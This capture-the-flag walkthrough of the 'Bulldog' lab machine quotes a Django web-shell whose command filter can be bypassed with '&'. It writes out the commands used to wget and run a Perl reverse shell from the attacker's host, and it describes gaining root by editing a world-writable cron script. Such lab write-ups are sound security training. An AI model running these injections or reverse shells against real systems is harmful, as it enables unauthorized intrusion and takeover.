Created by Nick Frichette

Software used: nmap, dirbuster, netcat

Nmap showed SSH running on the typical telnet port and two pythonbased HTTP-servers on port 80 and 8080.

Visiting the webserver on port 80 gave nothing of value. Running dirbuster against it gave a few interesting directories.

/dev/ directory showed a page and a link to a weird none-functioning site.

The source for the website showed a couple of possible usernames(before each @) and a md5sum for each user. Searching Google for each hash showed, that the hashed word for nick was “bulldog”.

/admin/ was a django loginpage. Using the username nick with the password “bulldog” worked.

The actual site didn’t have any functionality.

Looking further around and visiting the web-shell link on “/dev/” again showed, that the webshellpage had changed. It now featured a kind of webshell with a few commands and a textarea with the output. Trying to run two commands with “;” didn’t work. Browsering around on the filesystem showed the source for the django application in the file “views.py”

from django.shortcuts import render
import subprocess

commands = [ifconfig,ls,echo,pwd,cat,rm]

def homepage(request):
    return render(request, index.html)

def notice(request):
    return render(request, notice.html)

def dev(request):
    return render(request, dev.html)

def shell(request):
    if request.method == "POST":
    command = request.POST.get("command", None)
    to_return = "Command : " + command + "\n\n"

if validate(command):
    execute = subprocess.check_output(command, shell=True)
    to_return += execute
elif ";" in command:
    to_return += "INVALID COMMAND. I CAUGHT YOU HACKER! ‘;’ CAN BE USED TO EXECUTE MULTIPLE COMMANDS!!"
else:
    to_return += "INVALID COMMAND. I CAUGHT YOU HACKER!"

    context = {data: to_return}
    return render(request, shell.html, context)
    return render(request, shell.html)

def validate(command):
    if any(com in command for com in commands) and ";" not in command:
        return True
    return False

From the source I could read, that the program wasn’t secured against using “&”. As long as a allowed command was in the commandline and not a “;”, anything else could be included after a “&”.

So the easy thing would be to wget a reverse-shell and run it. First I needed a python HTTP server to serve a perl reverse-shell. I then ran “ls & wget http://192.168.1.38:8000/perl-reverse-shell.pl -O /home/django” in the web-shell. And then “ls & perl /home/django/perl-reverse-shell.pl” to connect to a already running netcat session on my workstation.

And we got a shell. This time running as the user “django”.

Looking around for a way to privesc I found the cronjob in /etc/cron.d/runAV which ran a python script every minute as root. The script didn’t do anything and it’s permission allowed it to be edited by everyone.

So I added the python os package for the os.system function to run a command. Then I added a line which would execute a new reverse-shell that I already had wgetted.

And after a minute my new netcat session was connected to by the new reverse-shell. And this time I had root and was able to read the flag.